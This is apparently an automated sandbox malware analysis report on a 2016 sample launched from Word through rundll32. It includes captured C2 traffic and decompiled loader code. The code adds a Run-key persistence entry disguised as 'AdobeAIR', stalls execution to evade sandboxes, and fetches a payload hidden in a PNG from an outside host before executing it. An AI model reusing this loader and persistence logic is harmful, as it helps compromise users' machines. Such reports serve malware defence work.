2016-09-07 10:49:31 UTC	443	49207	85.90.53.159	192.168.1.22	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 30 2e 31 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body bgcolor="white"><center><h1>504 Gateway Time-out</h1></center><hr><center>nginx/1.0.15</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->...
2016-09-07 10:49:37 UTC	49208	443	192.168.1.22	85.90.53.159	GET /includes/search/?category=u0ODktH8cC7yQOM&id=oGx4m&searchword=oj2qV2Ms&text=XMY&submit=O4&searchphrase=LnXrH&action=nr&lang=JiEvjCy5%2FSX&content=%2B3Rw%2BxtvHqboJ21ZZ9nohLN&search=v&find=f HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 Host: www.multipassplus.eu

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2644 Parent PID: 256

General

Start time:	12:43:01
Start date:	07/09/2016
Path:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	unknown
Imagebase:	0x12a0000
File size:	1937600 bytes
MD5 hash:	011578BCF2A97BCFF94E13D68FD1B8F1
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 3208 Parent PID: 2644

General

Start time:	12:44:00
Start date:	07/09/2016
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\paula\AppData\Roaming\Adobe\AIR\azgyrfhy.dat #2
Imagebase:	0x8c0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 756 Parent PID: 3208

General

Start time:	12:45:21
Start date:	07/09/2016
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 C:\Users\paula\AppData\Roaming\Adobe\AIR\azgyrfhy.dat #2
Imagebase:	0x8c0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 3208 Parent PID: 2644

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23.5%
Total number of Nodes:	170
Total number of Limit Nodes:	1

Executed Functions

Function 5ADE2580, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 178

C-Code - Quality: 75%

			E5ADE2580() {
				char _v1028;
				short _v3076;
				short _v5124;
				long _v5128;
				char _v5132;
				char _v5136;
				void _v5648;
				void* __ebx;
				void* __esi;
				void* _t34;
				void* _t35;
				void* _t47;
				void _t48;
				struct HINSTANCE__* _t53;
				WCHAR* _t60;
				WCHAR* _t62;
				signed int _t64;
				signed int _t74;
				WCHAR* _t82;
				void* _t83;

				_v5128 = GetTickCount();
				do {
					Sleep(2); // executed
				} while (GetTickCount() - _v5128 < 0x13880);
				SetUnhandledExceptionFilter(E5ADE27FA);
				if(GetModuleFileNameW( *0x5ade256c,  &_v3076, 0x400) == 0) {
					L9:
					E5ADE24ED(); // executed
					_t34 = E5ADE233B(); // executed
					__eflags = _t34;
					if(_t34 == 0) {
						L23:
						return _t34;
					}
					_t35 = E5ADE240D(); // executed
					__eflags = _t35 - 0xffffffff;
					if(_t35 == 0xffffffff) {
						GetModuleFileNameA( *0x5ade256c,  &_v5124, 0x400);
						wsprintfA( &_v1028, "rundll32 \"%s\", #2",  &_v5124);
						WinExec( &_v1028, 0); // executed
						ExitProcess(0);
					}
					_t34 = VirtualAlloc(0, 0xa00000, 0x3000, 4);
					__eflags = _t34;
					if(__eflags == 0) {
						goto L23;
					}
					 *0x5ade1e08 = _t34;
					asm("cld");
					memset( &_v5648, 0, 0x100 << 0);
					_t71 =  &_v5648;
					E5ADE1EE6( &_v5648,  &_v5136, _t82, __eflags,  &_v5132,  &_v5136,  &_v5132);
					_t47 =  &_v5648;
					__eflags = _v5136 - 2;
					if(_v5136 != 2) {
						_t47 = 0;
						_t71 = 0;
						__eflags = L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6";
						if(L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6" != 0) {
							_t71 = L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6";
						}
					}
					_t34 = E5ADE1032(_t71, L"www.diefenbachgymnasium.at", L"/sites/all/themes/diefenbach/small_logo.png",  *0x5ade1e08, 0xa00000, E5ADE1E04, _t47);
					__eflags =  *E5ADE1E04;
					if( *E5ADE1E04 == 0) {
						goto L23;
					} else {
						_t83 =  *0x5ade1e08; // 0x0
						asm("repe cmpsb");
						__eflags = 8;
						if(8 != 0) {
							goto L23;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t48 =  *_t83;
							asm("bswap eax");
							__eflags =  *((intOrPtr*)(_t48 + _t83 + 0x10)) - 0x54414449;
							if( *((intOrPtr*)(_t48 + _t83 + 0x10)) == 0x54414449) {
								break;
							}
							_t83 = _t83 + _t48 + 0xc;
						}
						_push(_t48);
						E5ADE161A(_t83 + 8, _t48, 0x5ade1b1d);
						 *0x5ade170a = GetProcAddress;
						GetModuleHandleA(0);
						_t53 =  *0x5ade256c; // 0x5ade0000
						_t34 = E5ADE18DF(__eflags, _t53, _t83 + 8, 0, 0);
						__eflags = _t34;
						if(_t34 == 0) {
							goto L23;
						}
						 *_t34(8, 1, 0x5ade2570);
						_t34 = E5ADE250C("processes_other_side_lower", 8);
						__eflags = _t34;
						if(_t34 == 0) {
							goto L23;
						}
						_t34 = CreateThread(0, 0, _t34, 0, 0, 0);
						__eflags = _t34;
						if(_t34 == 0) {
							goto L23;
						}
						return WaitForSingleObject(_t34, 0xffffffff);
					}
				}
				_t60 =  &_v5124;
				__imp__SHGetSpecialFolderPathW(0, _t60, 0x10, 0); // executed
				if(_t60 == 0) {
					L5:
					_t62 =  &_v3076;
					 *0x5ade257c = _t62;
					PathRemoveExtensionW(_t62);
					_t64 = lstrlenW( &_v3076);
					_t74 = _t64;
					_t82 =  &_v3076;
					while( *((short*)(_t82 + _t74 * 2)) != 0x5c) {
						_t74 = _t74 - 1;
						asm("jecxz 0x10");
					}
					_t34 = _t64 - _t74 - 1;
					__eflags = _t34 - 0x20;
					if(_t34 == 0x20) {
						goto L23;
					}
					goto L9;
				}
				_t34 = lstrlenW( &_v5124);
				asm("repe cmpsw");
				if(_t34 == 0) {
					goto L23;
				}
				goto L5;
			}

0x5ade2592
0x5ade2598
0x5ade259a
0x5ade25ac
0x5ade25b8
0x5ade25d8
0x5ade2656
0x5ade2656
0x5ade265b
0x5ade2660
0x5ade2663
0x5ade27b4
0x5ade27b4
0x5ade27b4
0x5ade2669
0x5ade266e
0x5ade2671
0x5ade27c7
0x5ade27e0
0x5ade27f2
0x5ade27fc
0x5ade27fc
0x5ade268b
0x5ade268b
0x5ade268d
0x00000000
0x00000000
0x5ade2693
0x5ade2698
0x5ade26a6
0x5ade26ae
0x5ade26bd
0x5ade26c2
0x5ade26c8
0x5ade26cf
0x5ade26d1
0x5ade26d3
0x5ade26d5
0x5ade26dd
0x5ade26df
0x5ade26df
0x5ade26dd
0x5ade2700
0x5ade2705
0x5ade270c
0x00000000
0x5ade2712
0x5ade2712
0x5ade2722
0x5ade2724
0x5ade2726
0x00000000
0x00000000
0x00000000
0x00000000
0x5ade272c
0x5ade272c
0x5ade272c
0x5ade272e
0x5ade2730
0x5ade2738
0x00000000
0x00000000
0x5ade273c
0x5ade273c
0x5ade2744
0x5ade274c
0x5ade2757
0x5ade275e
0x5ade2764
0x5ade2774
0x5ade2774
0x5ade2776
0x00000000
0x00000000
0x5ade2782
0x5ade278e
0x5ade278e
0x5ade2790
0x00000000
0x00000000
0x5ade27a3
0x5ade27a3
0x5ade27a5
0x00000000
0x00000000
0x00000000
0x5ade27aa
0x5ade270c
0x5ade25da
0x5ade25e7
0x5ade25ef
0x5ade2617
0x5ade2617
0x5ade261d
0x5ade2623
0x5ade2630
0x5ade2636
0x5ade2638
0x5ade263e
0x5ade2645
0x5ade2646
0x5ade2646
0x5ade264c
0x5ade264d
0x5ade2650
0x00000000
0x00000000
0x00000000
0x5ade2650
0x5ade25f8
0x5ade260c
0x5ade2611
0x00000000
0x00000000
0x00000000

APIs

GetTickCount.KERNEL32 ref: 5ADE258C
Sleep.KERNELBASE(00000002), ref: 5ADE259A
GetTickCount.KERNEL32 ref: 5ADE25A0
SetUnhandledExceptionFilter.KERNEL32(#5), ref: 5ADE25B8
GetModuleFileNameW.KERNEL32(?,00000400), ref: 5ADE25D0
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 5ADE25E7
lstrlenW.KERNEL32(?), ref: 5ADE25F8
PathRemoveExtensionW.SHLWAPI(?), ref: 5ADE2623
lstrlenW.KERNEL32(?), ref: 5ADE2630

Part of subcall function 5ADE233B: LoadLibraryA.KERNEL32(advapi32.dll), ref: 5ADE2384
Part of subcall function 5ADE233B: LoadLibraryA.KERNEL32(winhttp.dl), ref: 5ADE23B4

Part of subcall function 5ADE240D: GetModuleFileNameA.KERNEL32(?,00000400), ref: 5ADE2428
Part of subcall function 5ADE240D: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,0002001B,?), ref: 5ADE2446
Part of subcall function 5ADE240D: wsprintfA.USER32 ref: 5ADE2467
Part of subcall function 5ADE240D: RegQueryValueExA.KERNEL32(?,#3,00000000,00000000,?,?), ref: 5ADE248C
Part of subcall function 5ADE240D: lstrcmpiA.KERNEL32(?,?), ref: 5ADE24A4
Part of subcall function 5ADE240D: lstrlenA.KERNEL32(?), ref: 5ADE24B5
Part of subcall function 5ADE240D: RegSetValueExA.KERNEL32(?,#3,00000000,00000001,?,00000000), ref: 5ADE24D4
Part of subcall function 5ADE240D: RegCloseKey.ADVAPI32(?,-00000001), ref: 5ADE24E4

VirtualAlloc.KERNEL32(00000000,00A00000,00003000,00000004), ref: 5ADE2685

Part of subcall function 5ADE1032: StrStrA.SHLWAPI(00000000,accepted-), ref: 5ADE1201
Part of subcall function 5ADE1032: StrToIntA.SHLWAPI(00000000), ref: 5ADE1268
Part of subcall function 5ADE1032: lstrlenA.KERNEL32(00000000), ref: 5ADE1284
Part of subcall function 5ADE1032: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000004), ref: 5ADE1299
Part of subcall function 5ADE1032: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001), ref: 5ADE12B3
Part of subcall function 5ADE1032: lstrlenA.KERNEL32(00000000), ref: 5ADE12D4
Part of subcall function 5ADE1032: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000004), ref: 5ADE12E9
Part of subcall function 5ADE1032: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001), ref: 5ADE1303
Part of subcall function 5ADE1032: VirtualFree.KERNEL32(?,00000000,00008000), ref: 5ADE13A3
Part of subcall function 5ADE1032: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 5ADE13B3
Part of subcall function 5ADE1032: VirtualFree.KERNEL32(00000000,00008000), ref: 5ADE13E1

GetModuleHandleA.KERNEL32(00000000,00000000,5ADE1B1D,00000000,?,www.diefenbachgymnasium.at,/sites/all/themes/diefenbach/small_logo.png,00A00000,5ADE1E04,?,?,?,?), ref: 5ADE275E
#1.AZGYRFHY(?,00000001,5ADE2570,5ADE0000,-00000008,00000000,00000000,?,www.diefenbachgymnasium.at,/sites/all/themes/diefenbach/small_logo.png,00A00000,5ADE1E04,?,?,?,?), ref: 5ADE2789

Part of subcall function 5ADE250C: lstrcmpA.KERNEL32(?,00000000,00000000,?), ref: 5ADE253A

CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 5ADE279D
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 5ADE27AA
GetModuleFileNameA.KERNEL32(?,00000400), ref: 5ADE27C7
wsprintfA.USER32 ref: 5ADE27E0
WinExec.KERNEL32(?,00000000), ref: 5ADE27F2

Strings

IDAT, xrefs: 5ADE2730
processes_other_side_lower, xrefs: 5ADE2784
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6, xrefs: 5ADE26D5, 5ADE26DF, 5ADE26FF
www.diefenbachgymnasium.at, xrefs: 5ADE26FA
rundll32 "%s", #2, xrefs: 5ADE27DA
/sites/all/themes/diefenbach/small_logo.png, xrefs: 5ADE26F5

Memory Dump Source

Source File: 00000003.00000002.1050244578.5ADE1000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000003.00000002.1050237480.5ADE0000.00000002.sdmp
Associated: 00000003.00000002.1050251399.5ADE3000.00000004.sdmp
Associated: 00000003.00000002.1050258466.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5ade0000_rundll32.jbxd

Function 5ADE2580, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178

C-Code - Quality: 68%

			E5ADE2580(void* __fp0) {
				char _v1028;
				short _v3076;
				short _v5124;
				long _v5128;
				char _v5132;
				char _v5136;
				void _v5648;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t34;
				void* _t35;
				void* _t47;
				void _t48;
				struct HINSTANCE__* _t53;
				WCHAR* _t60;
				WCHAR* _t62;
				signed int _t64;
				void* _t67;
				signed int _t75;
				void* _t83;
				void* _t84;
				WCHAR* _t86;
				void* _t96;

				_t96 = __fp0;
				_v5128 = GetTickCount();
				do {
					Sleep(2); // executed
				} while (GetTickCount() - _v5128 < 0x13880);
				SetUnhandledExceptionFilter(E5ADE27FA);
				if(GetModuleFileNameW( *0x5ade256c,  &_v3076, 0x400) == 0) {
					L9:
					E5ADE24ED(); // executed
					_t34 = E5ADE233B(); // executed
					__eflags = _t34;
					if(_t34 == 0) {
						L23:
						return _t34;
					}
					_t35 = E5ADE240D(); // executed
					__eflags = _t35 - 0xffffffff;
					if(_t35 == 0xffffffff) {
						GetModuleFileNameA( *0x5ade256c,  &_v5124, 0x400);
						wsprintfA( &_v1028, 0x5ade1df2,  &_v5124);
						WinExec( &_v1028, 0); // executed
						ExitProcess(0);
					}
					_t34 = VirtualAlloc(0, 0xa00000, 0x3000, 4);
					__eflags = _t34;
					if(_t34 == 0) {
						goto L23;
					}
					 *0x5ade1e08 = _t34;
					asm("cld");
					memset( &_v5648, 0, 0x100 << 0);
					_t72 =  &_v5648;
					_t78 =  &_v5136;
					E5ADE1EE6( &_v5648,  &_v5132,  &_v5136,  &_v5132);
					_t47 =  &_v5648;
					__eflags = _v5136 - 2;
					if(_v5136 != 2) {
						_t47 = 0;
						_t72 = 0;
						__eflags =  *0x5ade1bbb;
						if( *0x5ade1bbb != 0) {
							_t72 = 0x5ade1bbb;
						}
					}
					_t34 = E5ADE1032(_t72, 0x5ade1b2d, E5ADE1B63,  *0x5ade1e08, 0xa00000, E5ADE1E04, _t47);
					__eflags =  *E5ADE1E04;
					if( *E5ADE1E04 == 0) {
						goto L23;
					} else {
						_t83 =  *0x5ade1e08; // 0x0
						asm("repe cmpsb");
						__eflags = 8;
						if(8 != 0) {
							goto L23;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t48 =  *_t83;
							asm("bswap eax");
							__eflags =  *((intOrPtr*)(_t48 + _t83 + 0x10)) - 0x54414449;
							if(__eflags == 0) {
								break;
							}
							_t83 = _t83 + _t48 + 0xc;
						}
						_t84 = _t83 + 8;
						_push(_t48);
						_push(0x5ade1b1d);
						_push(_t48);
						_push(_t84);
						E5ADE161A(_t67, 0x5ade1caa, _t84, __eflags, _t96);
						 *0x5ade170a = GetProcAddress;
						GetModuleHandleA(0);
						_t53 =  *0x5ade256c; // 0x5ade0000
						_push(0);
						_push(0);
						_push(_t84);
						_push(_t53);
						_t34 = E5ADE18DF(_t53, _t67, _t78, 0x5ade1caa, _t84);
						__eflags = _t34;
						if(_t34 == 0) {
							goto L23;
						}
						 *_t34(8, 1, E5ADE2570);
						_t34 = E5ADE250C(0x5ade1c8f, 8);
						__eflags = _t34;
						if(_t34 == 0) {
							goto L23;
						}
						_t34 = CreateThread(0, 0, _t34, 0, 0, 0);
						__eflags = _t34;
						if(_t34 == 0) {
							goto L23;
						}
						return WaitForSingleObject(_t34, 0xffffffff);
					}
				}
				_t60 =  &_v5124;
				__imp__SHGetSpecialFolderPathW(0, _t60, 0x10, 0); // executed
				if(_t60 == 0) {
					L5:
					_t62 =  &_v3076;
					 *0x5ade257c = _t62;
					PathRemoveExtensionW(_t62);
					_t64 = lstrlenW( &_v3076);
					_t75 = _t64;
					_t86 =  &_v3076;
					while( *((short*)(_t86 + _t75 * 2)) != 0x5c) {
						_t75 = _t75 - 1;
						asm("jecxz 0x10");
					}
					_t34 = _t64 - _t75 - 1;
					__eflags = _t34 - 0x20;
					if(_t34 == 0x20) {
						goto L23;
					}
					goto L9;
				}
				_t34 = lstrlenW( &_v5124);
				asm("repe cmpsw");
				if(_t34 == 0) {
					goto L23;
				}
				goto L5;
			}

0x5ade2580
0x5ade2592
0x5ade2598
0x5ade259a
0x5ade25ac
0x5ade25b8
0x5ade25d8
0x5ade2656
0x5ade2656
0x5ade265b
0x5ade2660
0x5ade2663
0x5ade27b4
0x5ade27b4
0x5ade27b4
0x5ade2669
0x5ade266e
0x5ade2671
0x5ade27c7
0x5ade27e0
0x5ade27f2
0x5ade27fc
0x5ade27fc
0x5ade268b
0x5ade268b
0x5ade268d
0x00000000
0x00000000
0x5ade2693
0x5ade2698
0x5ade26a6
0x5ade26ae
0x5ade26b4
0x5ade26bd
0x5ade26c2
0x5ade26c8
0x5ade26cf
0x5ade26d1
0x5ade26d3
0x5ade26d5
0x5ade26dd
0x5ade26df
0x5ade26df
0x5ade26dd
0x5ade2700
0x5ade2705
0x5ade270c
0x00000000
0x5ade2712
0x5ade2712
0x5ade2722
0x5ade2724
0x5ade2726
0x00000000
0x00000000
0x00000000
0x00000000
0x5ade272c
0x5ade272c
0x5ade272c
0x5ade272e
0x5ade2730
0x5ade2738
0x00000000
0x00000000
0x5ade273c
0x5ade273c
0x5ade2741
0x5ade2744
0x5ade2745
0x5ade274a
0x5ade274b
0x5ade274c
0x5ade2757
0x5ade275e
0x5ade2764
0x5ade2769
0x5ade276b
0x5ade276d
0x5ade276e
0x5ade2774
0x5ade2774
0x5ade2776
0x00000000
0x00000000
0x5ade2782
0x5ade278e
0x5ade278e
0x5ade2790
0x00000000
0x00000000
0x5ade27a3
0x5ade27a3
0x5ade27a5
0x00000000
0x00000000
0x00000000
0x5ade27aa
0x5ade270c
0x5ade25da
0x5ade25e7
0x5ade25ef
0x5ade2617
0x5ade2617
0x5ade261d
0x5ade2623
0x5ade2630
0x5ade2636
0x5ade2638
0x5ade263e
0x5ade2645
0x5ade2646
0x5ade2646
0x5ade264c
0x5ade264d
0x5ade2650
0x00000000
0x00000000
0x00000000
0x5ade2650
0x5ade25f8
0x5ade260c
0x5ade2611
0x00000000
0x00000000
0x00000000

APIs

GetTickCount.KERNEL32 ref: 5ADE258C
Sleep.KERNELBASE(00000002), ref: 5ADE259A
GetTickCount.KERNEL32 ref: 5ADE25A0
SetUnhandledExceptionFilter.KERNEL32(#5), ref: 5ADE25B8
GetModuleFileNameW.KERNEL32(?,00000400), ref: 5ADE25D0
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 5ADE25E7
lstrlenW.KERNEL32(?), ref: 5ADE25F8
PathRemoveExtensionW.SHLWAPI(?), ref: 5ADE2623
lstrlenW.KERNEL32(?), ref: 5ADE2630

Part of subcall function 5ADE233B: LoadLibraryA.KERNEL32(advapi32.dll), ref: 5ADE2384
Part of subcall function 5ADE233B: LoadLibraryA.KERNEL32(winhttp.dl), ref: 5ADE23B4

Part of subcall function 5ADE240D: GetModuleFileNameA.KERNEL32(?,00000400), ref: 5ADE2428
Part of subcall function 5ADE240D: RegOpenKeyExA.KERNEL32(80000001,5ADE1DC4,00000000,0002001B,?), ref: 5ADE2446
Part of subcall function 5ADE240D: wsprintfA.USER32 ref: 5ADE2467
Part of subcall function 5ADE240D: RegQueryValueExA.KERNEL32(?,5ADE1B14,00000000,00000000,?,?), ref: 5ADE248C
Part of subcall function 5ADE240D: lstrcmpiA.KERNEL32(?,?), ref: 5ADE24A4
Part of subcall function 5ADE240D: lstrlenA.KERNEL32(?), ref: 5ADE24B5
Part of subcall function 5ADE240D: RegSetValueExA.KERNEL32(?,5ADE1B14,00000000,00000001,?,00000000), ref: 5ADE24D4

VirtualAlloc.KERNEL32(00000000,00A00000,00003000,00000004), ref: 5ADE2685

Part of subcall function 5ADE1032: StrStrA.SHLWAPI(00000000,accepted-), ref: 5ADE1201
Part of subcall function 5ADE1032: StrToIntA.SHLWAPI(00000000), ref: 5ADE1268
Part of subcall function 5ADE1032: lstrlenA.KERNEL32(00000000), ref: 5ADE1284
Part of subcall function 5ADE1032: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000004), ref: 5ADE1299
Part of subcall function 5ADE1032: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001), ref: 5ADE12B3
Part of subcall function 5ADE1032: lstrlenA.KERNEL32(00000000), ref: 5ADE12D4
Part of subcall function 5ADE1032: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000004), ref: 5ADE12E9
Part of subcall function 5ADE1032: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001), ref: 5ADE1303
Part of subcall function 5ADE1032: VirtualFree.KERNEL32(?,00000000,00008000), ref: 5ADE13A3
Part of subcall function 5ADE1032: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 5ADE13B3
Part of subcall function 5ADE1032: VirtualFree.KERNEL32(00000000,00008000), ref: 5ADE13E1

GetModuleHandleA.KERNEL32(00000000,00000000,5ADE1B1D,00000000,?,5ADE1B2D,5ADE1B63,00A00000,5ADE1E04,?,?,?,?), ref: 5ADE275E
#1.AZGYRFHY(?,00000001,5ADE2570,5ADE0000,-00000008,00000000,00000000,?,5ADE1B2D,5ADE1B63,00A00000,5ADE1E04,?,?,?,?), ref: 5ADE2789

Part of subcall function 5ADE250C: lstrcmpA.KERNEL32(?,00000000,00000000,?), ref: 5ADE253A

CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 5ADE279D
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 5ADE27AA
GetModuleFileNameA.KERNEL32(?,00000400), ref: 5ADE27C7
wsprintfA.USER32 ref: 5ADE27E0
WinExec.KERNEL32(?,00000000), ref: 5ADE27F2

Strings

IDAT, xrefs: 5ADE2730

Memory Dump Source

Source File: 00000003.00000001.791609688.5ADE2000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000003.00000001.791594880.5ADE0000.00000002.sdmp
Associated: 00000003.00000001.791601940.5ADE1000.00000080.sdmp
Associated: 00000003.00000001.791616802.5ADE3000.00000004.sdmp
Associated: 00000003.00000001.791624248.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_5ade0000_rundll32.jbxd

Function 5ADE240D, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 65

C-Code - Quality: 100%

			E5ADE240D() {
				int _v8;
				char _v1032;
				void* _v1036;
				char _v3084;
				long _t17;
				long _t18;
				long _t22;
				int _t28;
				void* _t30;

				GetModuleFileNameA( *0x5ade256c,  &_v3084, 0x400);
				_t17 = RegOpenKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x2001b,  &_v1036); // executed
				_t18 = _t17;
				if(_t18 == 0) {
					wsprintfA( &_v1032, "rundll32 \"%s\", #2",  &_v3084);
					_t22 = RegQueryValueExA(_v1036,  &(("\\AdobeAIR")[1]), 0, 0,  &_v3084,  &_v8); // executed
					if(_t22 != 0) {
						L3:
						RegSetValueExA(_v1036,  &(("\\AdobeAIR")[1]), 0, 1,  &_v1032, lstrlenA( &_v1032)); // executed
						_t28 = 0xffffffffffffffff;
						L4:
						RegCloseKey(_v1036);
						_t30 = _t28;
						return _t30;
					}
					_t28 = lstrcmpiA( &_v3084,  &_v1032);
					if(_t28 == 0) {
						goto L4;
					}
					goto L3;
				}
				return _t18;
			}

0x5ade2428
0x5ade2446
0x5ade244c
0x5ade244e
0x5ade2467
0x5ade248c
0x5ade2494
0x5ade24ae
0x5ade24d4
0x5ade24dc
0x5ade24dd
0x5ade24e4
0x5ade24ea
0x00000000
0x5ade24ea
0x5ade24aa
0x5ade24ac
0x00000000
0x00000000
0x00000000
0x5ade24ac
0x5ade24ec

APIs

GetModuleFileNameA.KERNEL32(?,00000400), ref: 5ADE2428
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,0002001B,?), ref: 5ADE2446
wsprintfA.USER32 ref: 5ADE2467
RegQueryValueExA.KERNEL32(?,#3,00000000,00000000,?,?), ref: 5ADE248C
lstrcmpiA.KERNEL32(?,?), ref: 5ADE24A4
lstrlenA.KERNEL32(?), ref: 5ADE24B5
RegSetValueExA.KERNEL32(?,#3,00000000,00000001,?,00000000), ref: 5ADE24D4
RegCloseKey.ADVAPI32(?,-00000001), ref: 5ADE24E4

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 5ADE243C
rundll32 "%s", #2, xrefs: 5ADE2461
cHHw, xrefs: 5ADE248C

Memory Dump Source

Source File: 00000003.00000002.1050244578.5ADE1000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000003.00000002.1050237480.5ADE0000.00000002.sdmp
Associated: 00000003.00000002.1050251399.5ADE3000.00000004.sdmp
Associated: 00000003.00000002.1050258466.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5ade0000_rundll32.jbxd

Function 5ADE240D, Relevance: 10.6, APIs: 7, Instructions: 65

C-Code - Quality: 77%

			E5ADE240D() {
				int _v8;
				char _v1032;
				void* _v1036;
				char _v3084;
				long _t17;
				long _t18;
				long _t22;
				int _t28;
				void* _t30;

				GetModuleFileNameA( *0x5ade256c,  &_v3084, 0x400);
				_t17 = RegOpenKeyExA(0x80000001, 0x5ade1dc4, 0, 0x2001b,  &_v1036); // executed
				_t18 = _t17;
				if(_t18 == 0) {
					wsprintfA( &_v1032, 0x5ade1df2,  &_v3084);
					_t22 = RegQueryValueExA(_v1036, 0x5ade1b14, 0, 0,  &_v3084,  &_v8); // executed
					if(_t22 != 0) {
						L3:
						RegSetValueExA(_v1036, 0x5ade1b14, 0, 1,  &_v1032, lstrlenA( &_v1032)); // executed
						_t28 = 0xffffffffffffffff;
						L4:
						 *0x5ade22ff(_v1036, _t28);
						_pop(_t30);
						return _t30;
					}
					_t28 = lstrcmpiA( &_v3084,  &_v1032);
					if(_t28 == 0) {
						goto L4;
					}
					goto L3;
				}
				return _t18;
			}

APIs

GetModuleFileNameA.KERNEL32(?,00000400), ref: 5ADE2428
RegOpenKeyExA.KERNEL32(80000001,5ADE1DC4,00000000,0002001B,?), ref: 5ADE2446
wsprintfA.USER32 ref: 5ADE2467
RegQueryValueExA.KERNEL32(?,5ADE1B14,00000000,00000000,?,?), ref: 5ADE248C
lstrcmpiA.KERNEL32(?,?), ref: 5ADE24A4
lstrlenA.KERNEL32(?), ref: 5ADE24B5
RegSetValueExA.KERNEL32(?,5ADE1B14,00000000,00000001,?,00000000), ref: 5ADE24D4

Memory Dump Source

Source File: 00000003.00000001.791609688.5ADE2000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000003.00000001.791594880.5ADE0000.00000002.sdmp
Associated: 00000003.00000001.791601940.5ADE1000.00000080.sdmp
Associated: 00000003.00000001.791616802.5ADE3000.00000004.sdmp
Associated: 00000003.00000001.791624248.5ADE4000.00000002.sdmp

